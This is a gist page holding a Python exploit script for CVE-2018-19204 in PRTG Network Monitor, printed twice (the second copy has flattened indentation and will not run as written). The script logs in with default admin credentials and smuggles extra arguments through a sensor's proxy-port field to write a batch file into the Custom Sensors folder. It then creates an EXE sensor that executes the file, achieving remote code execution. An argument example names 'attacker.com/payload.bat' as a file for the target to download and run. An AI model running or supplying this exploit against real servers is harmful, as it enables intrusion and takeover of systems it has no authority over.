n30m1nd/CVE-2018-19204.py Secret

## CVE-2018-19204.py
#!/usr/bin/env python3

# Exploit for CVE-2018-19204
# Javier @ SensePost 2019

import requests
import argparse
import http.server, socketserver

parser = argparse.ArgumentParser()
parser.add_argument('target',
        help="target host. Example: https://10.0.0.1:8080/")

parser.add_argument('fileurl',
        help="url that the remote host will download and execute. Example: http://attacker.com/payload.bat")

parser.add_argument('-u', '--username',
    dest="username",
        help="username for the PRTG Admin interface", default="prtgadmin")

parser.add_argument('-p', '--password',
    dest="password",
        help="password for the PRTG Admin interface", default="prtgadmin")

args = parser.parse_args()
args.target = args.target.rstrip('/')

# POST /public/checklogin.htm
# loginurl=&username=prtgadmin&password=prtgadmin

if __name__ == "__main__":
    session = requests.Session()
    session.post(
            args.target + "/public/checklogin.htm",
            data={ 'loginurl': '', 'username': args.username, 'password': args.password }
    )

    print("[+] Stage 1 - Adding HTTP Advanced Sensor")

    session.post(
            args.target + "/addsensor5.htm",
            data={
                'id': '1', 'maxdownload_': '0', 'sslmethoddotnet_': 'sslvSSLv3TLSv1',
                'usecustomheaders_': 'no', 'intervalgroup': '1', 'useuseragent_': '0',
                'inherittriggers': '1', 'proxy_': '10.0.0.1', 'name_': 'CVE-2018-19204 EXPLOIT',
                'interval_': '60|60 seconds', 'tags_': 'httpsensor', 'includemusttype_': '0',
                'includemaynottype_': '0', 'priority_': '3', 'protocolversion_': '1', 'writeresult_': '1',
                'postcontentoptions_': '0', 'timeout_': '60', 'httpurl_': "http://www.sensepost.com",
                'proxyport_': '80" "-Proxy=" "-writeresult=\\\\127.0.0.1\\\\C$\\\\Program Files (x86)\\PRTG Network Monitor\\Custom Sensors\\EXE\\CVE-2018-19204.bat',
                'monitorchange_': '0', 'httpauthentication_': '0', 'httpmethod_': 'GET',
                'sni_inheritance_': '0', 'checkcertificate_': 'false', 'httpmustneeded_':
                '0', 'errorintervalsdown_': '1', 'httpproxy': '0', 'hybridmode_': 'dotnet',
                'httpmustnotneeded_': '0', 'httpauthneeded_': '0', 'sensortype': 'httpadvanced'
            }
    )

    print("[+] Stage 2 - Adding EXE/Script Sensor")

    session.post(
            args.target + "/addsensor5.htm",
            data={
                'id': '40', 'channel_': 'Value', 'timeout_': '60',
                'exefile_': 'CVE-2018-19204.bat|CVE-2018-19204.bat||', 'intervalgroup':
                '1', 'usewindowsauthentication_': '0', 'errorintervalsdown_': '1',
                'interval_': '60|60 seconds', 'name_': 'CVE-2018-19204 2nd STAGE EXPLOIT',
                'tags_': 'exesensor', 'monitorchange_': '0', 'environment_': '0',
                'inherittriggers': '1', 'valuetype_': '0', 'priority_': '3',
                'unit_': '#', 'writeresult_': '0', 'sensortype': 'exe'
            }
    )

    print("[+] Exploit completed, 60 seconds for execution.")
    print("[+] Sensors need manual cleanup!")
	#!/usr/bin/env python3

	# Exploit for CVE-2018-19204
	# Javier @ SensePost 2019

	import requests
	import argparse
	import http.server, socketserver

	parser = argparse.ArgumentParser()
	parser.add_argument('target',
	help="target host. Example: https://10.0.0.1:8080/")

	parser.add_argument('fileurl',
	help="url that the remote host will download and execute. Example: http://attacker.com/payload.bat")

	parser.add_argument('-u', '--username',
	dest="username",
	help="username for the PRTG Admin interface", default="prtgadmin")

	parser.add_argument('-p', '--password',
	dest="password",
	help="password for the PRTG Admin interface", default="prtgadmin")

	args = parser.parse_args()
	args.target = args.target.rstrip('/')

	# POST /public/checklogin.htm
	# loginurl=&username=prtgadmin&password=prtgadmin

	if __name__ == "__main__":
	session = requests.Session()
	session.post(
	args.target + "/public/checklogin.htm",
	data={ 'loginurl': '', 'username': args.username, 'password': args.password }
	)

	print("[+] Stage 1 - Adding HTTP Advanced Sensor")

	session.post(
	args.target + "/addsensor5.htm",
	data={
	'id': '1', 'maxdownload_': '0', 'sslmethoddotnet_': 'sslvSSLv3TLSv1',
	'usecustomheaders_': 'no', 'intervalgroup': '1', 'useuseragent_': '0',
	'inherittriggers': '1', 'proxy_': '10.0.0.1', 'name_': 'CVE-2018-19204 EXPLOIT',
	'interval_': '60\|60 seconds', 'tags_': 'httpsensor', 'includemusttype_': '0',
	'includemaynottype_': '0', 'priority_': '3', 'protocolversion_': '1', 'writeresult_': '1',
	'postcontentoptions_': '0', 'timeout_': '60', 'httpurl_': "http://www.sensepost.com",
	'proxyport_': '80" "-Proxy=" "-writeresult=\\\\127.0.0.1\\\\C$\\\\Program Files (x86)\\PRTG Network Monitor\\Custom Sensors\\EXE\\CVE-2018-19204.bat',
	'monitorchange_': '0', 'httpauthentication_': '0', 'httpmethod_': 'GET',
	'sni_inheritance_': '0', 'checkcertificate_': 'false', 'httpmustneeded_':
	'0', 'errorintervalsdown_': '1', 'httpproxy': '0', 'hybridmode_': 'dotnet',
	'httpmustnotneeded_': '0', 'httpauthneeded_': '0', 'sensortype': 'httpadvanced'
	}
	)

	print("[+] Stage 2 - Adding EXE/Script Sensor")

	session.post(
	args.target + "/addsensor5.htm",
	data={
	'id': '40', 'channel_': 'Value', 'timeout_': '60',
	'exefile_': 'CVE-2018-19204.bat\|CVE-2018-19204.bat\|\|', 'intervalgroup':
	'1', 'usewindowsauthentication_': '0', 'errorintervalsdown_': '1',
	'interval_': '60\|60 seconds', 'name_': 'CVE-2018-19204 2nd STAGE EXPLOIT',
	'tags_': 'exesensor', 'monitorchange_': '0', 'environment_': '0',
	'inherittriggers': '1', 'valuetype_': '0', 'priority_': '3',
	'unit_': '#', 'writeresult_': '0', 'sensortype': 'exe'
	}
	)

	print("[+] Exploit completed, 60 seconds for execution.")
	print("[+] Sensors need manual cleanup!")